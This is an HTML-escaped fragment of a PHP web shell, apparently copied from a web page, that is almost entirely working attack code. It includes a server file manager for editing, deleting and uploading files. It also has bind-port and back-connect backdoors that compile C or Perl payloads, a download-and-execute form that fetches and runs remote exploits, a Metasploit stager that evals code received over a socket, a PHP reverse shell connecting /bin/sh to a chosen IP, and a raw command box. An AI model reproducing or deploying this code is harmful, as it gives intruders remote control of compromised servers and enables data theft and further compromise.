&lt;tr&gt;&lt;td&gt;Actions&lt;/td&gt;&lt;td&gt;&lt;a href='?y=$pwd&amp;amp;edit=$file'&gt;edit&lt;/a&gt; | &lt;a
href=\&quot;javascript:tukar('&quot;.clearspace($filn).&quot;_link','&quot;.clearspace($filn)
.&quot;_form');\&quot;&gt;rename&lt;/a&gt; | &lt;a href='?y=$pwd&amp;amp;delete=$file'&gt;delete&lt;/a&gt; |
&lt;a href='?y=$pwd&amp;amp;dl=$file'&gt;download&lt;/a&gt;&amp;nbsp;(&lt;a
href='?y=$pwd&amp;amp;dlgzip=$file'&gt;gzip&lt;/a&gt;)&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;View&lt;/td&gt;&lt;td&gt;&lt;a href='?y=&quot;.$pwd.&quot;&amp;amp;view=&quot;.$file.&quot;'&gt;text&lt;/a&gt; |
&lt;a href='?y=&quot;.$pwd.&quot;&amp;amp;view=&quot;.$file.&quot;&amp;amp;type=code'&gt;code&lt;/a&gt; | &lt;a
href='?y=&quot;.$pwd.&quot;&amp;amp;view=&quot;.$file.&quot;&amp;amp;type=image'&gt;image&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;
/table&gt;&quot;;
if(isset($_GET['type']) &amp;&amp; ($_GET['type']=='image')){echo &quot;&lt;div
style='text-align:center;margin:8px;'&gt;&lt;img
src='?y=&quot;.$pwd.&quot;&amp;amp;img=&quot;.$filn.&quot;'&gt;&lt;/div&gt;&quot;;}
elseif(isset($_GET['type']) &amp;&amp; ($_GET['type']=='code')){echo &quot;&lt;div
class='viewfile'&gt;&quot;;$file =
wordwrap(@file_get_contents($file),&quot;240&quot;,&quot;\n&quot;);@highlight_string($file);e
cho &quot;&lt;/div&gt;&quot;;} else {echo &quot;&lt;div class='viewfile'&gt;&quot;;echo
nl2br(htmlentities((@file_get_contents($file))));echo
&quot;&lt;/div&gt;&quot;;}}elseif(is_dir($_GET['view'])){echo showdir($pwd,$prompt);}}
elseif(isset($_GET['edit']) &amp;&amp; ($_GET['edit'] !=
&quot;&quot;)){if(isset($_POST['save'])){$file = $_POST['saveas'];$content =
magicboom($_POST['content']);if($filez = @fopen($file,&quot;w&quot;)){$time =
date(&quot;d-M-Y H:i&quot;,time());if(@fwrite($filez,$content)) $msg = &quot;file saved
&lt;span class='gaya'&gt;@&lt;/span&gt; &quot;.$time;else $msg = &quot;failed to
save&quot;;@fclose($filez);}else $msg = &quot;permission
denied&quot;;}if(!isset($file))$file = $_GET['edit'];if($filez =
@fopen($file,&quot;r&quot;)){$content = &quot;&quot;;
while(!feof($filez)){$content .=
htmlentities(str_replace(&quot;''&quot;,&quot;'&quot;,fgets($filez)));}
@fclose($filez);}?&gt;&lt;form action=&quot;?y=&lt;?php echo $pwd;?&gt;&amp;amp;edit=&lt;?php
echo $file;?&gt;&quot; method=&quot;post&quot;&gt; &lt;table class=&quot;cmdbox&quot;&gt; &lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;
&lt;textarea class=&quot;output&quot; name=&quot;content&quot;&gt;
&lt;?php echo $content;?&gt;&lt;/textarea&gt; &lt;tr&gt;
&lt;td colspan=&quot;2&quot;&gt;Save as &lt;input onMouseOver=&quot;this.focus();&quot; id=&quot;cmd&quot;
class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;saveas&quot; style=&quot;width:60%;&quot; value=&quot;&lt;?php
echo $file;?&gt;&quot; /&gt;&lt;input class=&quot;inputzbut&quot; type=&quot;submit&quot; value=&quot;Save !&quot;
name=&quot;save&quot; style=&quot;width:12%;&quot; /&gt; &amp;nbsp;&lt;?php echo
$msg;?&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/form&gt; &lt;?php }
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] ==
'upload')){if(isset($_POST['uploadcomp'])){if(is_uploaded_file($_FILES['f
ile']['tmp_name'])){$path = magicboom($_POST['path']);$fname =
$_FILES['file']['name'];$tmp_name = $_FILES['file']['tmp_name'];$pindah =
$path.$fname;$stat = @move_uploaded_file($tmp_name,$pindah);if ($stat)
{$msg = &quot;file uploaded to $pindah&quot;;} else $msg = &quot;failed to upload
$fname&quot;;}else $msg = &quot;failed to upload $fname&quot;;}
elseif(isset($_POST['uploadurl'])){$pilihan =
trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$path =
magicboom($_POST['path']);$namafile = download($pilihan,$wurl);$pindah =
$path.$namafile;if(is_file($pindah)){$msg = &quot;file uploaded to
$pindah&quot;;}else $msg =&quot;failed to upload $namafile&quot;;}?&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;div
class=&quot;mybox&quot;&gt;&lt;form action=&quot;?y=&lt;?php echo $pwd;?&gt;&amp;amp;x=upload&quot;
enctype=&quot;multipart/form-data&quot; method=&quot;post&quot;&gt;&lt;h1 class=&quot;B0K4_B4B42&quot;&gt;Upload
Files To The Server&lt;/h1&gt;&lt;table class=&quot;tabnet&quot;
style=&quot;width:320px;padding:0 1px;&quot;&gt; &lt;tr&gt;&lt;th colspan=&quot;2&quot;&gt;Local&lt;/th&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;p style=&quot;text-align:center;&quot;&gt;&lt;input
style=&quot;color:#000000;&quot; type=&quot;file&quot; name=&quot;file&quot; /&gt;&amp;nbsp;&lt;input
type=&quot;submit&quot; name=&quot;uploadcomp&quot; class=&quot;inputzbut&quot; value=&quot;Go&quot;
style=&quot;width:80px;&quot;&gt;&lt;/p&gt;&lt;/td&gt; &lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;input type=&quot;text&quot;
class=&quot;inputz&quot; style=&quot;width:99%;&quot; name=&quot;path&quot; value=&quot;&lt;?php echo $pwd;?&gt;&quot;
/&gt;&lt;/td&gt;&lt;/tr&gt; &lt;/tr&gt; &lt;/table&gt;&lt;/form&gt;&lt;br&gt;&lt;table class=&quot;tabnet&quot;
style=&quot;width:320px;padding:0 1px;&quot;&gt; &lt;tr&gt;&lt;th colspan=&quot;2&quot;&gt;Remote&lt;/th&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;form method=&quot;post&quot; style=&quot;margin:0;padding:0;&quot;
actions=&quot;?y=&lt;?php echo $pwd;?&gt;&amp;amp;x=upload&quot;&gt;
&lt;table&gt;&lt;tr&gt;&lt;td&gt;link&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;wurl&quot;
style=&quot;width:250px;&quot; value=&quot;http://site/file.*&quot;&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td
colspan=&quot;2&quot;&gt;&lt;input type=&quot;text&quot; class=&quot;inputz&quot; style=&quot;width:99%;&quot;
name=&quot;path&quot; value=&quot;&lt;?php echo $pwd;?&gt;&quot; /&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;&lt;select
size=&quot;1&quot; class=&quot;inputz&quot; name=&quot;pilihan&quot;&gt; &lt;option
value=&quot;wwget&quot;&gt;wget&lt;/option&gt; &lt;option value=&quot;wlynx&quot;&gt;lynx&lt;/option&gt; &lt;option
value=&quot;wfread&quot;&gt;fread&lt;/option&gt; &lt;option value=&quot;wfetch&quot;&gt;fetch&lt;/option&gt;
&lt;option value=&quot;wlinks&quot;&gt;links&lt;/option&gt; &lt;option value=&quot;wget&quot;&gt;GET&lt;/option&gt;
&lt;option value=&quot;wcurl&quot;&gt;curl&lt;/option&gt; &lt;/select&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;input
type=&quot;submit&quot; name=&quot;uploadurl&quot; class=&quot;inputzbut&quot; value=&quot;Go&quot;
style=&quot;width:246px;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;div
style=&quot;text-align:center;margin:2px;&quot;&gt;&lt;?php echo
$msg;?&gt;&lt;/div&gt;&lt;/div&gt;&lt;/center&gt;
&lt;?php }
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'back')){
if (isset($_POST['bind']) &amp;&amp; !empty($_POST['port']) &amp;&amp;
!empty($_POST['bind_pass']) &amp;&amp; ($_POST['use'] == 'C')) {$port =
trim($_POST['port']);$passwrd =
trim($_POST['bind_pass']);tulis(&quot;bdc.c&quot;,$port_bind_bd_c);exe(&quot;gcc -o bdc
bdc.c&quot;);exe(&quot;chmod 777 bdc&quot;);@unlink(&quot;bdc.c&quot;);exe(&quot;./bdc &quot;.$port.&quot;
&quot;.$passwrd.&quot; &amp;&quot;);$scan = exe(&quot;ps aux&quot;);if(eregi(&quot;./bdc $por&quot;,$scan)){$msg
= &quot;&lt;p&gt;Process successed&lt;/p&gt;&quot;;} else {$msg = &quot;&lt;p&gt;Process Failed&lt;/p&gt;&quot;;}}
elseif (isset($_POST['bind']) &amp;&amp; !empty($_POST['port']) &amp;&amp;
!empty($_POST['bind_pass']) &amp;&amp; ($_POST['use'] == 'Perl')) {$port =
trim($_POST['port']);$passwrd =
trim($_POST['bind_pass']);tulis(&quot;bdp&quot;,$port_bind_bd_pl);exe(&quot;chmod 777
bdp&quot;);$p2=which(&quot;perl&quot;);exe($p2.&quot; bdp &quot;.$port.&quot; &amp;&quot;);$scan = exe(&quot;ps
aux&quot;);if(eregi(&quot;$p2 bdp $port&quot;,$scan)){$msg = &quot;&lt;p&gt;Process
successed&lt;/p&gt;&quot;;} else {$msg = &quot;&lt;p&gt;Process Failed&lt;/p&gt;&quot;;} }
elseif (isset($_POST['backconn']) &amp;&amp; !empty($_POST['backport']) &amp;&amp;
!empty($_POST['ip']) &amp;&amp; ($_POST['use'] == 'C')) {$ip =
trim($_POST['ip']);$port =
trim($_POST['backport']);tulis(&quot;bcc.c&quot;,$back_connect_c);exe(&quot;gcc -o bcc
bcc.c&quot;);exe(&quot;chmod 777 bcc&quot;);@unlink(&quot;bcc.c&quot;);exe(&quot;./bcc &quot;.$ip.&quot;
&quot;.$port.&quot; &amp;&quot;);$msg = &quot;trying to connect to &quot;.$ip.&quot; on port &quot;.$port.&quot;
...&quot;;}
elseif (isset($_POST['backconn']) &amp;&amp; !empty($_POST['backport']) &amp;&amp;
!empty($_POST['ip']) &amp;&amp; ($_POST['use'] == 'Perl')) {
$ip = trim($_POST['ip']);$port =
trim($_POST['backport']);tulis(&quot;bcp&quot;,$back_connect);
exe(&quot;chmod +x bcp&quot;);$p2=which(&quot;perl&quot;);exe($p2.&quot; bcp &quot;.$ip.&quot; &quot;.$port.&quot;
&amp;&quot;);
$msg = &quot;Trying to connect to &quot;.$ip.&quot; on port &quot;.$port.&quot; ...&quot;;}
elseif (isset($_POST['expcompile']) &amp;&amp; !empty($_POST['wurl']) &amp;&amp;
!empty($_POST['wcmd'])) {$pilihan = trim($_POST['pilihan']);$wurl =
trim($_POST['wurl']);$namafile = download($pilihan,$wurl);
if(is_file($namafile)){$msg = exe($wcmd);}
else $msg = &quot;error: file not found $namafile&quot;;}?&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; &lt;table
class=&quot;tabnet&quot;&gt; &lt;tr&gt;&lt;th&gt;Bind Port&lt;/th&gt;&lt;th&gt;Back connect&lt;/th&gt;&lt;th&gt;download
and Exec&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt; &lt;table&gt; &lt;form method=&quot;post&quot; actions=&quot;?y=&lt;?php
echo $pwd;?&gt;&amp;amp;x=back&quot;&gt;&lt;tr&gt;&lt;td&gt;Port&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot;
type=&quot;text&quot; name=&quot;port&quot; size=&quot;26&quot; value=&quot;&lt;?php echo $bindport
?&gt;&quot;&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;Password&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot;
name=&quot;bind_pass&quot; size=&quot;26&quot; value=&quot;&lt;?php echo
$bindport_pass;?&gt;&quot;&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;Use&lt;/td&gt;&lt;td style=&quot;textalign:justify&quot;&gt;&lt;p&gt;&lt;select class=&quot;inputz&quot; size=&quot;1&quot; name=&quot;use&quot;&gt;&lt;option
value=&quot;Perl&quot;&gt;Perl&lt;/option&gt;&lt;option value=&quot;C&quot;&gt;C&lt;/option&gt;&lt;/select&gt;&lt;input
class=&quot;inputzbut&quot; type=&quot;submit&quot; name=&quot;bind&quot; value=&quot;Bind&quot;
style=&quot;width:120px&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt; &lt;/td&gt; &lt;td&gt;&lt;table&gt; &lt;form
method=&quot;post&quot; actions=&quot;?y=&lt;?php echo
$pwd;?&gt;&amp;amp;x=back&quot;&gt;&lt;tr&gt;&lt;td&gt;IP&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot;
name=&quot;ip&quot; size=&quot;26&quot; value=&quot;&lt;?php echo ((getenv('REMOTE_ADDR')) ?
(getenv('REMOTE_ADDR')) : (&quot;127.0.0.1&quot;));?&gt;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;Port&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot; name=&quot;backport&quot;
size=&quot;26&quot; value=&quot;&lt;?php echo $bindport;?&gt;&quot;&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td&gt;Use&lt;/td&gt;&lt;td
style=&quot;text-align:justify&quot;&gt;&lt;p&gt;&lt;select size=&quot;1&quot; class=&quot;inputz&quot;
name=&quot;use&quot;&gt;&lt;option value=&quot;Perl&quot;&gt;Perl&lt;/option&gt;&lt;option
value=&quot;C&quot;&gt;C&lt;/option&gt;&lt;/select&gt; &lt;input type=&quot;submit&quot; name=&quot;backconn&quot;
value=&quot;Connect&quot; class=&quot;inputzbut&quot;
style=&quot;width:120px&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt; &lt;/td&gt; &lt;td&gt; &lt;table&gt; &lt;form
method=&quot;post&quot; actions=&quot;?y=&lt;?php echo
$pwd;?&gt;&amp;amp;x=back&quot;&gt;&lt;tr&gt;&lt;td&gt;url&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot; type=&quot;text&quot;
name=&quot;wurl&quot; style=&quot;width:250px;&quot; value=&quot;www.somecode/exploits.c&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;cmd&lt;/td&gt;&lt;td&gt;&lt;input class=&quot;inputz&quot;
type=&quot;text&quot; name=&quot;wcmd&quot; style=&quot;width:250px;&quot; value=&quot;gcc -o exploits
exploits.c;chmod +x exploits;./exploits;&quot;&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt;&lt;td&gt;&lt;select
size=&quot;1&quot; class=&quot;inputz&quot; name=&quot;pilihan&quot;&gt; &lt;option
value=&quot;wwget&quot;&gt;wget&lt;/option&gt; &lt;option value=&quot;wlynx&quot;&gt;lynx&lt;/option&gt; &lt;option
value=&quot;wfread&quot;&gt;fread&lt;/option&gt; &lt;option value=&quot;wfetch&quot;&gt;fetch&lt;/option&gt;
&lt;option value=&quot;wlinks&quot;&gt;links&lt;/option&gt;&lt;option value=&quot;wget&quot;&gt;GET&lt;/option&gt;
&lt;option value=&quot;wcurl&quot;&gt;curl&lt;/option&gt; &lt;/select&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;input
type=&quot;submit&quot; name=&quot;expcompile&quot; class=&quot;inputzbut&quot; value=&quot;Go&quot;
style=&quot;width:246px;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;div
style=&quot;text-align:center;margin:2px;&quot;&gt;&lt;?php echo $msg;?&gt;&lt;/div&gt;&lt;br&gt;
&lt;?php
error_reporting(0);
function ss($t){if (!get_magic_quotes_gpc()) return
trim(urldecode($t));return trim(urldecode(stripslashes($t)));}
$s_my_ip = $_SERVER['REMOTE_ADDR'];$rsport = &quot;443&quot;;$rsportb4 =
$rsport;$rstarget4 = $s_my_ip;$s_result = &quot;&lt;center&gt;&lt;div class='mybox'
align='center'&gt;&lt;td&gt;&lt;h2&gt;Reverse shell ( php )&lt;/h2&gt;&lt;form method='post'
actions='?y=&lt;?php echo $pwd;?&gt;&amp;amp;x='back'&gt;&lt;table
class='myboxtbl'&gt;&lt;tr&gt;&lt;td style='width:100px;'&gt;Your IP&lt;/td&gt;&lt;td&gt;&lt;input
style='width:100%;' class='inputz' type='text' name='rstarget4'
value='&quot;.$rstarget4.&quot;' /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Port&lt;/td&gt;&lt;td&gt;&lt;input
style='width:100%;' class='inputz' type='text' name='sqlportb4'
value='&quot;.$rsportb4.&quot;' /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;input type='submit'
name='xback_php' class='inputzbut' value='connect'
style='width:120px;height:30px;margin:10px 2px 0 2px;' /&gt;&lt;input
type='hidden' name='d' value='&quot;.$pwd.&quot;' /&gt;&lt;/form&gt;&lt;/td&gt;&lt;/div&gt;&lt;br&gt;&lt;div
class='mybox'&gt;&lt;td&gt;&lt;form method='POST'&gt;&lt;table
class='myboxtbl'&gt;&lt;h2&gt;Metasploit Connection &lt;/h2&gt;&lt;tr&gt;&lt;td
style='width:100px;'&gt;Your IP&lt;/td&gt;&lt;td&gt;&lt;input style='width:100%;'
class='inputz' type='text' size='40' name='yip' value='&quot;.$my_ip.&quot;'
/&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Port&lt;/td&gt;&lt;td&gt;&lt;input style='width:100%;'
class='inputz' type='text' size='5' name='yport' value='443'
/&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;input class='inputzbut' type='submit'
value='Connect' name='metaConnect'
style='width:120px;height:30px;margin:10px 2px 0
2px;'&gt;&lt;/form&gt;&lt;/td&gt;&lt;/div&gt;&lt;/center&gt;&quot;;
echo $s_result;
if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port =
$_POST['yport'];if ($ip == &quot;&quot; &amp;&amp; $port == &quot;&quot;){echo &quot;fill in the
blanks&quot;;}else {if (FALSE !== strpos($ipaddr, &quot;:&quot;)) {$ipaddr = &quot;[&quot;.
$ipaddr .&quot;]&quot;;}if (is_callable('stream_socket_client')){$msgsock =
stream_socket_client(&quot;tcp://{$ipaddr}:{$port}&quot;);if
(!$msgsock){die();}$msgsock_type = 'stream';}elseif
(is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if
(!$msgsock) {die(); }$msgsock_type = 'stream';}elseif
(is_callable('socket_create')){$msgsock = socket_create(AF_INET,
SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if
(!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch
($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case
'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a =
unpack(&quot;Nlen&quot;, $len);$len = $a['len'];$buffer = '';while (strlen($buffer)
&lt; $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock,
$len-strlen($buffer)); break;case 'socket': $buffer .=
socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo
&quot;[*] Connection Terminated&quot;;die();}}
if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']);
if(isset($_REQUEST['rstarget4'])) $rstarget4 =
ss($_REQUEST['rstarget4']);
if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size
= 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon =
0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork();
if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1)
exit(1);$daemon = 1;}
umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock)
exit(1);
$descriptorspec = array(0 =&gt; array(&quot;pipe&quot;, &quot;r&quot;), 1 =&gt; array(&quot;pipe&quot;, &quot;w&quot;),
2 =&gt; array(&quot;pipe&quot;, &quot;w&quot;));
$process = proc_open($shell, $descriptorspec, $pipes);
if(!is_resource($process)) exit(1);
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a =
array($sock, $pipes[1], $pipes[2]);$num_changed_sockets =
stream_select($read_a, $write_a, $error_a, null);
if(in_array($sock, $read_a)){$input = fread($sock,
$chunk_size);fwrite($pipes[0], $input);}
if(in_array($pipes[1], $read_a)){$input = fread($pipes[1],
$chunk_size);fwrite($sock, $input);}
if(in_array($pipes[2], $read_a)){$input = fread($pipes[2],
$chunk_size);fwrite($sock,
$input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes
[2]);proc_close($process);$rsres = &quot; &quot;;$s_result .= $rsres;}}
elseif(isset($_GET['x']) &amp;&amp; ($_GET['x'] == 'shell')){?&gt;
&lt;form action=&quot;?y=&lt;?php echo $pwd;?&gt;&amp;amp;x=shell&quot; method=&quot;post&quot;&gt; &lt;table
class=&quot;cmdbox&quot;&gt; &lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;
&lt;textarea class=&quot;output&quot; readonly&gt;
&lt;?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?&gt;
&lt;/textarea&gt; &lt;tr&gt;&lt;td colspan=&quot;2&quot;&gt;&lt;?php echo $prompt;?&gt;&lt;input
onMouseOver=&quot;this.focus();&quot; id=&quot;cmd&quot; class=&quot;inputz&quot; type=&quot;text&quot;
name=&quot;cmd&quot; style=&quot;width:60%;&quot; value=&quot;&quot; /&gt;&lt;input class=&quot;inputzbut&quot;
type=&quot;submit&quot; value=&quot;Do !&quot; name=&quot;submitcmd&quot; style=&quot;width:12%;&quot;
/&gt;&lt;/td&gt;&lt;/tr&gt; &lt;/table&gt;&lt;/form&gt;
&lt;?php }else{if(isset($_GET['delete']) &amp;&amp; ($_GET['delete'] != &quot;&quot;)){$file =
$_GET['delete'];@unlink($file);}
elseif(isset($_GET['fdelete']) &amp;&amp; ($_GET['fdelete'] !=
&quot;&quot;)){@rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));}
elseif(isset($_GET['mkdir']) &amp;&amp; ($_GET['mkdir'] != &quot;&quot;)){$path =
$pwd.$_GET['mkdir'];@mkdir($path);}$buff = showdir($pwd,$prompt);echo
$buff;}
?&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
Download